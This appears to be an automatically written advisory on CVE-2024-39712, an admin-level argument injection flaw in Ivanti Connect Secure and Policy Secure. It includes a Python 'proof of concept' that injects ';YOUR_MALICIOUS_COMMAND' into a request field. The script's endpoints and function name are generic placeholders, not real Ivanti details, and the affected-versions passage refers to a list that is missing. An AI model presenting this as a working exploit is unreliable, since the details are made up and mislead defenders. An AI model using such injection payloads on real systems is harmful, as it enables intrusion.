CVE-2024-39712 - Critical Argument Injection Vulnerability in Ivanti Connect Secure and Ivanti Policy Secure Leading to Remote Code Execution for Admin Users

A critical security vulnerability has been unearthed in certain versions of Ivanti Connect Secure and Ivanti Policy Secure software products. Classified as CVE-2024-39712, this vulnerability relates specifically to argument injection. Exploiting this weakness enables remote authenticated attackers, who possess administrative privileges, to carry out remote code execution on any vulnerable system. In the sections below, we will expand on the details of this vulnerability, demonstrate an exploit using a code snippet, and provide links to essential resources and references.

All versions prior to 22.7R1.1

To ensure the safety of your system, it is critical to upgrade any of the above-mentioned software products to the latest version.

Vulnerability Details

This particular argument injection flaw takes place when an authenticated admin user triggers the vulnerable function via an external input. The software incorrectly concatenates the input data, which results in an unintended command execution. This may lead to various security risks, including unauthorized access to sensitive data or unauthorized actions carried out on the targeted system.

Potential attackers would require admin access to exploit this vulnerability, which limits the potential attack surface. However, organizations using the affected software should still treat this as a major threat.

Exploit Example

Let's look at the following example of how an attacker might exploit this vulnerability using Python. The following proof of concept (PoC) code demonstrates how an attacker can inject a malicious command as an argument when calling the vulnerable function:

import requests

# Replace the target URL, username, and password
target_url = "http://example.com";
username = "admin"
password = "secretpassword"

# Authenticate using the provided username and password
auth_data = {"username": username, "password": password}
response = requests.post(f"{target_url}/api/auth", data=auth_data)

# Check if the authentication is successful
if response.status_code == 200:
    auth_token = response.json().get("token")
    
    # Prepare the malicious payload
    payload = ";YOUR_MALICIOUS_COMMAND"
    
    # Inject the payload into the vulnerable function as an argument
    headers = {"Authorization": f"Bearer {auth_token}", "Content-Type": "application/json"}
    post_data = {"function": f"vulnerable_function{payload}"}
    response = requests.post(f"{target_url}/api/vulnerable", data=post_data, headers=headers)
    
    if response.status_code == 200:
        print("Exploit successful")
    else:
        print("Exploit failed")
else:
    print("Authentication failed")

In the code snippet above, replace YOUR_MALICIOUS_COMMAND with your own malicious command or code.

Original References

1. Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39712
2. Ivanti Security Advisory: https://www.ivanti.com/advisory/ivanti-security-advisory-22-005

Mitigation & Prevention

To mitigate the risk of exploitation and protect your organization from this vulnerability, it is highly recommended to update your Ivanti Connect Secure and Ivanti Policy Secure software products to the latest version as soon as possible.

In summary, CVE-2024-39712 remains a high-risk vulnerability for organizations using affected versions of Ivanti Connect Secure and Ivanti Policy Secure software products. It is imperative to take the threat seriously and apply the recommended preventative measures to ensure that your systems remain protected.

Timeline

Published on: 11/13/2024 02:15:19 UTC
Last modified on: 12/01/2024 19:15:04 UTC